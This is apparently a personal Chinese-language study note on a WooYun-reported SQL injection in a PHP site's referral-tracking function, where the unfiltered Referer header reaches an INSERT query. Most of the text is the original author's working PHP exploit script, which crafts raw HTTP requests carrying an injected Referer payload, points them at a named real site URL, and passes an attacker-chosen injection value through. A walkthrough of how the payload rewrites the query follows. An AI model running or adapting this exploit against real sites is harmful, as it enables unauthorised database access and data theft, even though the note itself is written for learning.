from : http://www.wooyun.org/bugs/wooyun-2013-038804
code:
function Popularize()
{
global $db;
$userid = safeData("userid","get");
if (!isNum($userid)) { die("用户非法,请从新登陆!");}
$Ip = getip();
$Ly = $_SERVER["HTTP_REFERER"];
$row = $db->getRow("select * from tbl_user where u_id=" . $userid ."");
if ($row){
$sql="Select * From tbl_user_visit where uv_userid = " .$userid." and uv_ip ='".$Ip."' and STR_TO_DATE(uv_time,'%Y-%m-%d')='".date("Y-m-d")."'";
$rsUv = $db->query($sql);
$nums= $db -> num_rows($rsUv);
if ($nums==0){
$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");
$db->query("update tbl_user set u_popularizenum=u_popularizenum+1,u_points=u_points+".app_userpopularize." where u_id = ". $userid );
$sql="Delete From tbl_user_visit where STR_TO_DATE(uv_time,'%Y-%m-%d')<'".date("Y-m-d")."'";
$db->query($sql);
}
}
die("<sc" . "ript type=\"text/javascript\">location.href='" .getIndexLink() ."';</sc" . "ript>");
}
很好理解。$Ly = $_SERVER["HTTP_REFERER"];
referer没过滤。
导致注射。
看作者poc:
<?php
function uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {
$return = '';
$matches = parse_url($url);
!isset($matches['host']) && $matches['host'] = '';
!isset($matches['path']) && $matches['path'] = '';
!isset($matches['query']) && $matches['query'] = '';
!isset($matches['port']) && $matches['port'] = '';
$host = $matches['host'];
$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';
$port = !empty($matches['port']) ? $matches['port'] : 80;
if($post) {
$out = "POST $path HTTP/1.0\r\n";
$out .= "Accept: **\r\n";
//$out .= "Referer: $boardurl\r\n";
$out .= "Accept-Language: zh-cn\r\n";
$out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n";
$out .= "Cookie: $cookie\r\n\r\n";
}else {
$out = "GET $path HTTP/1.0\r\n";
$out .= "Accept: */*\r\n";
$out .= "Referer: a',(select now()) and ".$inject.")#\r\n";
$out .= "Accept-Language: zh-cn\r\n";
$out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n";
$out .= "Cookie: $cookie\r\n\r\n";
}
$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
if(!$fp) {
return '';//note $errstr : $errno \r\n
} else {
stream_set_blocking($fp, $block);
stream_set_timeout($fp, $timeout);
@fwrite($fp, $out);
$status = stream_get_meta_data($fp);
if(!$status['timed_out']) {
while (!feof($fp)) {
if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) {
break;
}
}
$stop = false;
while(!feof($fp) && !$stop) {
$data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
$return .= $data;
if($limit) {
$limit -= strlen($data);
$stop = $limit <= 0;
}
}
}
@fclose($fp);
return $return;
}
}
uc_fopen('http://www.391.net/user/service.php?action=popularize&userid=597',0,0,0,FALSE,'',15,true,$_GET["a"]);
echo 'hi';
?>
把这段php代码放到本地服务器上,先来看看代码干了什么。
因为是post方式,所以我们只看post分支。 首先构造了一个http包,然后用fsockopen发包。
看作者构造的referer:
$out .= "Referer: a',(select now()) and ".$inject.")#\r\n";
$inject 传参是 $_GET["a"],我们假设$_GET["a"]是2
所以实际的referer是:Referer: a',(select now()) and 2)#\r\n
带入到注入的句子中
发生注入的是这句:
$db->query("insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values('".$userid."','".$Ip."','".$Ly."','".date('Y-m-d H:i:s',time())."') ");
正常情况下 进入的sql语句为:
insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values(' 1 ','0.0.0.0','a','2011-11-11 1:1:1')
注入后的句子为:
insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values(' 1 ','0.0.0.0','a',(select now()) and 2)#\r\n','2011-11-11 1:1:1')
#屏蔽后面的sql,所以就是
insert tbl_user_visit (uv_userid,uv_ip,uv_ly,uv_time) values(' 1 ','0.0.0.0','a',(select now()) and 2)
数字2 就是可注入部分。
作者将参数a挂在本地php后get注入。
最后得到信息。
对于insert注入得到信息。 此处需要继续学习一下。暂且挂了链接(http://drops.wooyun.org/tips/2078)
饿了 吃饭去。。